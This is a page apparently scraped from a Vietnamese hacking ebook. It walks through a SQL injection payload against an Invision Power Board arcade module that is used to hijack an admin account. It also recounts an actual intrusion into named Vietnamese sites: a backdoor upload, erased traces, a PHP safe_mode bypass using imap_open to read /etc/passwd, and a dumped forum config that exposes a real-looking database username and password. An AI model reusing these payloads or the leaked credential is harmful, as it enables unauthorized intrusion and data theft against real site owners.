Hacker Professional Ebook part 287 potx

=1' Run IE ta đc Code: mySQL query error: SELECT name FROM ibf_members WHERE id=1' mySQL error: You have an error in your SQL syntax.. Check the manual that corresponds to your MySQL ser

Trang 1

=1'

Run IE ta đc

Code:

mySQL query error: SELECT name FROM ibf_members WHERE id=1'

mySQL error: You have an error in your SQL syntax Check the manual that

corresponds to your MySQL server version for the right syntax to use near '' at line

1

mySQL error code:

Date: Tuesday 09th of november 2006 10 : 05 : 30 PM

Site đã dính Bug

Ở dây tui kô đề cập tới vấn đề lấy pass hash nữa mà change pass Admin luôn

Forgot pass Admin giống như mấy bài trên Reg&Code=10

Đợi tí rùi ta lấy Vkey bằng lệnh sau

Code:

?act=Arcade&module=report&user=-1%20%20UNION%20SELECT%20v.vid%20FROM%20ibf_validating%20v%2ci bf_topics%20t%20WHERE%20v.member_id=1

Thêm sau Index.php nha

Run IE nào ta sẽ thấy

Player Details for Vkey ở đây

Có Vkey rùi các bạn sẽ change pass admin giống như mấy bài trên đã nói

Hix Cop Xong và chỉnh sửa mấy bài này hi vọng mấy sếp Thăng chức cho kô thì buồn lắm

Nhocikaka(HCE)

Bypass safemode restrictions [PHP] (phần 1)

Bài này của Rekor ( vnISS )

Phần 1 - imap_open

hôm nay ngồi check dancevn.com nó ko activate acc của mình thế là quay ra local thử

tạch tạch tạch

Trích:

Trang 2

http://whois.sc/dancevn.com

chà chà

Trích:

Reverse IP: 68 other sites hosted on this server

click vô coi có cái gì hay

bug IPB chắc còn nh` site dính nên rek chọn huongxua.com

sau 5' ta có backdoor qua bug search.php, up thêm 1 phát vào /uploads/rek.php xóa dấu vết completed ^ ^

tiếp tục coi con server này

Trích:

uname -a : Linux host.vietnamnetweb.com 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6 15:28:36 MSK 2006 i686

Server : Apache/1.3.34 (Unix) mod_gzip/1.3.26.1a mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.2 FrontPage

id : user=nobody uid=99 gid=99

pwd : /home/huongxua/public_html/uploads ( drwxrwxrwx )

Trích:

safe_mode: ON PHP version: 4.4.2 cURL: ON MySQL: ON MSSQL: OFF

PostgreSQL: OFF Oracle: OFF

Disable functions : show_sourccapeshellcmd,chgrp,ini_alter,pcntl_exec,

leak,exec,dl,shell_exec,system,popen,pclose,proc_o

pen,proc_close,passthru,virtual,set_time_limit

HDD Free : 4.27 GB HDD Total : 10 GB

chà nó disable hết ráo kernel 2.6.8 mà 2006 thí chắc fix bug rồi

tìm cách bypass safemode để local vậy

nhìn vào con r57 với safemode on mới thấy nó hiện ra nh` functions hay ho

rek đã thực hiện thành công qua bug imap functions bypass safemode

vào box eval(); của r57

Trích:

$rek = @imap_open("/etc/passwd", "", "");

$result = @imap_body($rek, 1);

echo $result;

@imap_close($rek);

> dính bug rồi

Trích:

Trang 3

Root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:5:0:sync:/sbin:/bin/sync

shutdown:6:0:shutdown:/sbin:/sbin/shutdown

halt:7:0:halt:/sbin:/sbin/halt

mail:8:12:mail:/var/spool/mail:/sbin/nologin

news:9:13:news:/etc/news:

uucp:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:11:0:operator:/root:/sbin/nologin

games :12:100:games:/usr/games:/sbin/nologin

gopher :13:30:gopher:/var/gopher:/sbin/nologin

ftp :14:50:FTP User:/var/ftp:/sbin/nologin

nobody :99:99:Nobody:/:/sbin/nologin

dbus :81:81:System message bus:/:/sbin/nologin

vcsa :69:69:virtual console memory owner:/dev:/sbin/nologin

nscd :28:28:NSCD Daemon:/:/sbin/nologin

rpm :37:37::/var/lib/rpm:/sbin/nologin

mailnull :47:47::/var/spool/mqueue:/sbin/nologin

smmsp :51:51::/var/spool/mqueue:/sbin/nologin

named :25:25:Named:/var/named:/sbin/nologin

haldaemon :68:68:HAL daemon:/:/sbin/nologin

sshd :74:74 rivilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc :32:32 ortmapper RPC user:/:/sbin/nologin

apache :48:48:Apache:/var/www:/sbin/nologin

mysql :100:101:MySQL server:/var/lib/mysql:/bin/bash

cpanel :32001:32001::/usr/local/cpanel:/bin/bash

mailman :32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/bash clamav :32003:32003::/usr/local/clamav:/bin/false

baclieu :32013:32013::/home/baclieu:/usr/local/cpanel/bin/noshell bacvie2 :32014:32014::/home/bacvie2:/bin/false

bacvietl :32015:32015::/home/bacvietl:/bin/false

bamboo :32016:32016::/home/bamboo:/usr/local/cpanel/bin/noshell beetlevn :32019:32019::/home/beetlevn:/usr/local/cpanel/bin/noshell bemimi :32020:32020::/home/bemimi:/usr/local/cpanel/bin/noshell card4gam :32027:32027::/home/card4gam:/usr/local/cpanel/bin/noshell

Trang 4

chifash :32029:32029::/home/chifash:/usr/local/cpanel/bin/noshell

client44 :32031:32031::/home/client44:/usr/local/cpanel/bin/noshell ctnnambo :32034:32034::/home/ctnnambo:/usr/local/cpanel/bin/noshell ctyvhdoa :32035:32035::/home/ctyvhdoa:/usr/local/cpanel/bin/noshell dacloc :32038:32038::/home/dacloc:/usr/local/cpanel/bin/noshell

dahuco :32041:32041::/home/dahuco:/usr/local/cpanel/bin/noshell

dancevn :32044:32044::/home/dancevn:/usr/local/cpanel/bin/noshell dbvncom :32046:32046::/home/dbvncom:/usr/local/cpanel/bin/noshell dtlan :32057:32057::/home/dtlan:/usr/local/cpanel/bin/noshell

ecombeta :32058:32058::/home/ecombeta:/usr/local/cpanel/bin/noshell fontviet :32060:32060::/home/fontviet:/usr/local/cpanel/bin/noshell gamervie :32063:32063::/home/gamervie:/usr/local/cpanel/bin/noshell hmchanh :32066:32066::/home/hmchanh:/usr/local/cpanel/bin/noshell host4vn :32069:32069::/home/host4vn:/usr/local/cpanel/bin/noshell huongxua :32071:32071::/home/huongxua:/usr/local/cpanel/bin/noshell hvuong :32072:32072::/home/hvuong:/usr/local/cpanel/bin/noshell i3dvrco :32073:32073::/home/i3dvrco:/usr/local/cpanel/bin/noshell internet :32075:32075::/home/internet:/usr/local/cpanel/bin/noshell jasmine :32076:32076::/home/jasmine:/usr/local/cpanel/bin/noshell kanvn :32079:32079::/home/kanvn:/usr/local/cpanel/bin/noshell

lotussol :32089:32089::/home/lotussol:/usr/local/cpanel/bin/noshell minhtrung :32096:32096::/home/minhtrung:/usr/local/cpanel/bin/noshell ngayvui :32101:32101::/home/ngayvui:/usr/local/cpanel/bin/noshell nhmobile :32105:32105::/home/nhmobile:/usr/local/cpanel/bin/noshell nhumanh :32106:32106::/home/nhumanh:/usr/local/cpanel/bin/noshell onebitso :32109:32109::/home/onebitso:/usr/local/cpanel/bin/noshell phodiaoc :32112:32112::/home/phodiaoc:/usr/local/cpanel/bin/noshell qmcitvn :32115:32115::/home/qmcitvn:/usr/local/cpanel/bin/noshell saigons :32117:32117::/home/saigons:/usr/local/cpanel/bin/noshell scooter :32119:32119::/home/scooter:/usr/local/cpanel/bin/noshell

sweetlov :32131:32131::/home/sweetlov:/bin/bash

teenager :32134:32134::/home/teenager:/usr/local/cpanel/bin/noshell thanhnie :32137:32137::/home/thanhnie:/usr/local/cpanel/bin/noshell tmnet :32143:32143::/home/tmnet:/usr/local/cpanel/bin/noshell

tmsnet :32144:32144::/home/tmsnet:/usr/local/cpanel/bin/noshell

trituec :32150:32150::/home/trituec:/usr/local/cpanel/bin/noshell

trituetr :32151:32151::/home/trituetr:/usr/local/cpanel/bin/noshell

vietcao :32157:32157::/home/vietcao:/usr/local/cpanel/bin/noshell

Trang 5

vietchan :32158:32158::/home/vietchan:/usr/local/cpanel/bin/noshell

vietnama :32161:32161::/home/vietnama:/usr/local/cpanel/bin/noshell

vietnamc :32162:32162::/home/vietnamc:/usr/local/cpanel/bin/noshell

vietpoin :32165:32165::/home/vietpoin:/usr/local/cpanel/bin/noshell

vietxuan :32167:32167::/home/vietxuan:/usr/local/cpanel/bin/noshell

vuinet :32169:32169::/home/vuinet:/bin/false

xuanhong2 :32173:32173::/home/xuanhong2:/usr/local/cpanel/bin/noshell beta :32176:32176::/home/beta:/usr/local/cpanel/bin/noshell

otonhapk :32177:32177::/home/otonhapk:/usr/local/cpanel/bin/noshell

xehoisec :32178:32178::/home/xehoisec:/usr/local/cpanel/bin/noshell

autonhap :32179:32179::/home/autonhap:/usr/local/cpanel/bin/noshell

xehoima :32180:32180::/home/xehoima:/usr/local/cpanel/bin/noshell

dosaigon :32188:32188::/home/dosaigon:/usr/local/cpanel/bin/noshell

trandich :32190:32190::/home/trandich:/usr/local/cpanel/bin/noshell

thuongqu :32193:32193::/home/thuongqu:/usr/local/cpanel/bin/noshell

saigonse :32194:32194::/home/saigonse:/usr/local/cpanel/bin/noshell

thucong :32196:32196::/home/thucong:/usr/local/cpanel/bin/noshell

kan :32197:32197::/home/kan:/usr/local/cpanel/bin/noshell

binhthua :32198:32198::/home/binhthua:/bin/false

netviets :32200:32200::/home/netviets:/usr/local/cpanel/bin/noshell

tiếp tục:

Trích:

$dir = "/home/dancevn/public_html/rum";

$rek = @imap_open('/etc/passwd', "", "");

$dirlist = @imap_list($rek, trim($dir), "*");

for ($i = 0; $i < count($dir_list); $i++) echo $dirlist[$i]."\r\n";

@imap_close($rek);

hix ko list đc hết rồi, thôi cứ test tiếp coi

Trích:

$rek = @imap_open("/home/dancevn/public_html/rum/conf_global.php", "", "");

$result = @imap_body($rek, 1);

echo $result;

@imap_close($rek);

hehe đến đây là xong rồi, nhiệm vụ hoàn thành:

Trích:

$INFO['sql_driver'] = 'mysql';

Trang 6

$INFO['sql_host'] = 'localhost';

$INFO['sql_database'] = 'dancevn_rum';

$INFO['sql_user'] = 'dancevn_dancevn';

$INFO['sql_pass'] = 'Youandme';

$INFO['sql_tbl_prefix'] = 'ibf_';

Định dạng
Số trang	6
Dung lượng	1,18 MB